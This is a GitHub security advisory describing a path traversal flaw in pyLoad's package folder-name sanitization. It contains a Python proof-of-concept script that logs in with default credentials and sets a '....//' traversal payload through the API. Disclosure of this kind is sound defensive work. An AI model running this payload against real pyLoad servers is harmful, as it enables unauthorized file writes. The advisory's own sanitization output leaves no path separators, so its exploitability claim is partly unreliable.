Skip to content

PyLoad Vulnerable to Path Traversal via Package Folder Name

Moderate severity GitHub Reviewed Published Apr 26, 2026 in pyload/pyload • Updated May 5, 2026

Package

pip pyload-ng (pip)

Affected versions

<= 0.5.0b3.dev79

Patched versions

0.5.0b3.dev100

Description

Insufficient sanitization of package folder names allows writing files outside the intended download directory.

Affected Component

  • src/pyload/core/api/__init__.py
  • Function: add_package()

Description

Package folder names are sanitized using insufficient string replacement:

folder = (
    folder.replace("http://", "")
    .replace("https://", "")
    .replace("../", "_")  # Bypassable!
    .replace("..\\", "_")
    .replace(":", "")
    .replace("/", "_")
    .replace("\\", "_")
)

The ../ replacement is bypassable. The pattern ....// becomes .._ after replacement (partial removal), leaving .. which can be exploited when the path is later resolved by the OS.

Proof of Concept

Setup

pip install pyload-ng[all]
pyload -d &
# Default credentials: pyload / pyload

Exploit

#!/usr/bin/env python3
import requests

BASE_URL = "http://localhost:8000"
USERNAME = "pyload"
PASSWORD = "pyload"

session = requests.Session()

# Login
session.post(f"{BASE_URL}/login", data={
    "username": USERNAME,
    "password": PASSWORD
})

# Create package with malicious folder name
# The pattern ....// bypasses the ../ replacement
# After sanitization: .._ (still contains ..)
folder_payload = "....//....//....//tmp/evil"

resp = session.post(f"{BASE_URL}/api/add_package", json={
    "name": "test_package",
    "links": ["http://example.com/file.txt"],
    "dest": 1  # Destination.QUEUE
})

package_id = resp.json()
print(f"Created package: {package_id}")

# Set malicious folder name
resp = session.post(f"{BASE_URL}/api/set_package_data", json={
    "package_id": package_id,
    "data": {"folder": folder_payload}
})

print(f"Set folder payload: {folder_payload}")
print(f"Response: {resp.status_code}")

# When download occurs, files will be written outside download dir
print("[+] When a file is downloaded, it will be written to manipulated path")
print("    The sanitized folder still contains '..' sequences that OS resolves")

Verification

Check where files would be written:

import os

download_dir = "/home/user/Downloads"
folder = "....//....//....//tmp/evil"

# Simulate pyLoad's sanitization
sanitized = folder.replace("../", "_").replace("/", "_")
print(f"After pyLoad sanitization: {sanitized}")
# Output: .._.._.._tmp_evil

# When pyLoad does os.path.join and then opens the file:
final_path = os.path.join(download_dir, sanitized)
print(f"Joined path: {final_path}")
# Output: /home/user/Downloads/.._.._.._tmp_evil

# The .. sequences remain and could be resolved by OS during file operations

Impact

Authenticated users with ADD permission can:

  • Write files outside the download directory
  • Potentially overwrite system files (depending on permissions)
  • Clutter system directories with downloaded content

References

@GammaC0de GammaC0de published to pyload/pyload Apr 26, 2026
Published to the GitHub Advisory Database May 5, 2026
Reviewed May 5, 2026
Last updated May 5, 2026

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

EPSS score

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Learn more on MITRE.

CVE ID

CVE-2026-42314

GHSA ID

GHSA-97r3-5w84-r4q8

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.